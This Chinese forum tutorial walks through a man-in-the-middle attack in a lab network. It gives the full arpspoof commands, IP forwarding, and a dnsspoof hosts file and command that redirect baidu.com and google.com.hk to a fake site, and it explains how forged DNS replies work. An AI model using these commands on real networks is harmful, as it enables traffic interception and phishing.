找回密码
 立即注册

QQ登录

只需一步,快速开始

需要材料
1.攻击环境
2.攻击者(kali linux):10.10.10.1
3.攻击目标:10.10.10.2
4.默认网关:10.10.10.254
5.DNS服务器: 8.8.8.8
6.伪造网站: 10.10.10.3
7.攻击步骤



过程实现
先进行arp欺骗,以中转攻击目标的所有上网流量
echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2
按照hosts文件格式,创建一个dnsspoof.hosts文件, 当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。
cat dnsspoof.hosts
10.10.10.3 .baidu.com
10.10.10.3
.google.com.hk
执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则
dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53
这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。
通过抓包分析,dnsspoof的原理如下
由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3

安全无边疆,努力习知识
本文章只供学习交流学习不可用于其他非法用途!!!
文章作者:南风。
文章来源:kali中文网论坛:www.kaliorg.com
版权声明:凡注明“来源:kali中文网”的所有作品,均为kali中文网以作者的作品,未经作者及网站授权不得转载、摘编或利用其它方式使用上述作品。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:kali中文网(www.kaliorg.com)"。违反上述声明者,本站将追究其相关法律责任。
分享至 : QQ空间
收藏

7 个回复

倒序浏览
请问一下为啥我按照上面的流程去做,host文件里面想要冒充的域名是百度,但最后还是能正常访问百度网址的?
回复 使用道具 举报
好好好好好好好好好好好好好好好好好顶
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 立即注册